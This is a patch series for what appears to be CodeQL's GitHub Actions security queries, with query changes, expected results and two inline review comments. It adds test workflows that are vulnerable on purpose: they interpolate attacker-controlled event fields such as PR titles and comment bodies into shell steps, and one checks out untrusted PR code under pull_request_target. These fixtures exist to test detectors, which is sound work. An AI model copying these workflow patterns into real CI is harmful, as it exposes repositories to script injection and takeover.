@@ -7,3 +7,51 @@ extensions: pack: githubsecuritylab/actions-all extensible: workflowDataModel data: [] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: contextTriggerDataModel + data: + # This predicate maps triggering events with the github event context available for that event + - ["commit_comment", "github.event.comment"] + - ["discussion", "github.event.discussion"] + - ["discussion_comment", "github.event.comment"] + - ["discussion_comment", "github.event.discussion"] + - ["issues", "github.event.issue"] + - ["issue_comment", "github.event.issue"] + - ["issue_comment", "github.event.comment"] + - ["gollum", "github.event.pages"] + - ["merge_group", "github.event.merge_group"] + - ["pull_request", "github.event.pull_request"] + - ["pull_request", "github.head_ref"] + - ["pull_request_comment", "github.event.comment"] + - ["pull_request_comment", "github.event.pull_request"] + - ["pull_request_comment", "github.head_ref"] + - ["pull_request_review", "github.event.pull_request"] + - ["pull_request_review", "github.event.review"] + - ["pull_request_review", "github.head_ref"] + - ["pull_request_review_comment", "github.event.comment"] + - ["pull_request_review_comment", "github.event.pull_request"] + - ["pull_request_review_comment", "github.event.review"] + - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_target", "github.event.pull_request"] + - ["pull_request_target", "github.head_ref"] + - ["push", "github.event.commits"] + - ["push", "github.event.head_commit"] + - ["repository_dispatch", "github.event.client_payload"] + - ["workflow_dispatch", "github.event.inputs"] + - ["workflow_run", "github.event.workflow"] + - ["workflow_run", "github.event.workflow_run"] + # workflow_call receives the same event payload as the calling workflow + - ["workflow_call", "github.event.client_payload"] + - ["workflow_call", "github.event.comment"] + - ["workflow_call", "github.event.commits"] + - ["workflow_call", 
"github.event.discussion"] + - ["workflow_call", "github.event.head_commit"] + - ["workflow_call", "github.event.inputs"] + - ["workflow_call", "github.event.issue"] + - ["workflow_call", "github.event.merge_group"] + - ["workflow_call", "github.event.pages"] + - ["workflow_call", "github.event.pull_request"] + - ["workflow_call", "github.event.review"] + - ["workflow_call", "github.event.workflow"] + - ["workflow_call", "github.event.workflow_run"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 995fefe4a15..4ca3753f50c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it - - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' @@ -14,3 +14,4 @@ jobs: - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - run: echo '${{ github.event.pull_request.head.ref }}' - run: echo '${{ github.head_ref }}' + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index afd39605bb3..9992fd8e4cb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml 
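Review bot: The `workflow_call` rows list every `github.event.*` prefix but not `github.head_ref`, although the comment says a called workflow receives the caller's event payload. With the `GitHubSource` class added in this commit, `github.head_ref` would then not be a source in a workflow that is triggered only by `workflow_call`; suggest adding `- ["workflow_call", "github.head_ref"]`. `pull_request_comment` is, as far as I know, not an event a workflow can subscribe to (pull-request comments arrive as `issue_comment`), so those three rows look inert and deserve a comment or removal.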
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,7 +13,7 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - run: ${{ steps.source.outputs.value }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 34e173a055b..dc653a074e9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | 
@@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | 
@@ -262,4 +259,3 @@ subpaths | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 4b270404373..ab0a69a8fa8 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | 
@@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | 
@@ -312,8 +309,6 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | 
@@ -332,8 +327,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml deleted file mode 100644 index 8bfa15b405c..00000000000 --- a/ql/test/query-tests/Security/CWE-094/action1/action.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: 'test' -description: 'test' -branding: - icon: 'test' - color: 'test' -inputs: - test: - description: test - required: false - default: 'test' -runs: - using: "composite" - steps: - - run: echo '${{ github.event.comment.body }}' From e28ad1d644e50148ec8efb43e85519658b9d88ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 0294/1267] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc..a3fcc9e0403 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d..562fc0809b7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From 558bea84d435f7b0cd10a775c6eb65478e5bec63 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 0295/1267] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 00000000000..1debaecf97d --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 612be64ffcaa276f659bc1a4d98005d90a3e19f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:10:26 +0200 Subject: [PATCH 0296/1267] Consider actor and association checks as bypassable checks ONLY for issueOps --- .../CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 10 ++++++++-- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 10 ++++++++-- 2 files changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a3fcc9e0403..b7b8a3cf956 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 562fc0809b7..65887922231 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
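Review bot: In the added `matches("%_comment")` conjunct, `_` is a single-character wildcard for QL's `matches`, so the pattern accepts any event name ending in one arbitrary character plus `comment`, not the literal suffix `_comment`. Escaping it as `matches("%\\_comment")`, or listing the intended events explicitly, would make the IssueOps restriction say what it means; as written it also covers `commit_comment`, `discussion_comment` and `pull_request_review_comment`, which may or may not be intended. The test is taken over any trigger event of the enclosing job, so a workflow that combines a comment trigger with other triggers appears to be reported for its actor/association gate whichever event is relevant; a comment would help if that over-approximation is deliberate. The identical disjunction is added to UntrustedCheckoutTOCTOUHigh.ql in the next hunk, and a shared predicate would keep the two queries from drifting apart.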
@@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep + not checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() From dfeefe0caabc46a1676b042b9ea189fc8892e4c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:17:26 +0200 Subject: [PATCH 0297/1267] Consider actor and association checks as bypassable checks ONLY for issueOps --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 4 +++- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 5d501f2cea9..6b3e0628f40 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index e2f2b26a75c..fcf83269960 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ 